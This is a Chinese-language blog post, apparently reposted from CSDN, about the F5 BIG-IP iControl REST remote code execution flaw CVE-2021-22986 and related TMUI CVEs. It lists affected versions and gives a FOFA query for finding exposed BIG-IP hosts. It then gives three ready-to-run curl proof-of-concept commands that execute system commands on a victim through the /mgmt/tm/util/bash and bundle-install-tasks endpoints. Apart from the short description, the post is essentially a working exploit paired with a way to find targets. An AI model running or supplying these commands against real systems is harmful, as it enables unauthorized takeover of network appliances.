F5 BIG-IP iControl RCE (CVE-2021-22986)

漏洞描述

F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。

1、CVE-2021-22986 BIG-IP/BIG-IQ iControl REST 未授权远程代码执行漏洞 中,未经身份验证的攻击者可通过iControl REST接口,构造恶意请求,执行任意系统命令。

2、CVE-2021-22987 BIG-IP TMUI 后台远程代码执行漏洞 中,经过身份验证的用户可构造恶意请求,执行任意系统命令。

3、CVE-2021-22988 BIG-IP TMUI 后台远程代码执行漏洞 中,经过身份验证的用户可构造恶意请求,执行任意系统命令。

4、CVE-2021-22989 Advanced WAF/ASM TMUI 后台远程代码执行漏洞 中,经过身份验证的用户通可构造恶意请求,执行任意系统命令。

5、CVE-2021-22990 Advanced WAF/ASM TMUI 后台远程代码执行漏洞 中,经过身份验证的用户可构造恶意请求,执行任意系统命令

影响版本

CVE-2021-22986 影响版本:
F5 BIG-IP 16.0.0-16.0.1
F5 BIG-IP 15.1.0-15.1.2
F5 BIG-IP 14.1.0-14.1.3.1
F5 BIG-IP 13.1.0-13.1.3.5
F5 BIG-IP 12.1.0-12.1.5.2
F5 BIG-IQ 7.1.0-7.1.0.2
F5 BIG-IQ 7.0.0-7.0.0.1
F5 BIG-IQ 6.0.0-6.1.0

CVE-2021-22987,CVE-2021-22988,CVE-2021-22989,CVE-2021-22990 影响版本:
F5 BIG-IP 16.0.0-16.0.1
F5 BIG-IP 15.1.0-15.1.2
F5 BIG-IP 14.1.0-14.1.3.1
F5 BIG-IP 13.1.0-13.1.3.5
F5 BIG-IP 12.1.0-12.1.5.2
F5 BIG-IP 11.6.1-11.6.5.2

fofa查询

(server="BigIP" || title="BIG-IP®- Redirect") && server!="Jboss"

POC

1

curl -su admin: -H "Content-Type: application/json" http://[victimIP]/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}'

在这里插入图片描述

2

curl -ks https://[victimIP]/mgmt/shared/authn/login -d '{"bigipAuthCookie":"","loginReference":{"link":"http://localhost/mgmt/tm/access/bundle-install-tasks"},"filePath":"id"}'

在这里插入图片描述

3

curl -ksu admin:[redacted] https://[vimtimIP]/mgmt/tm/access/bundle-install-tasks -d '{"filePath":"id"}'

在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/weixin_44146996/article/details/115004114
今日推荐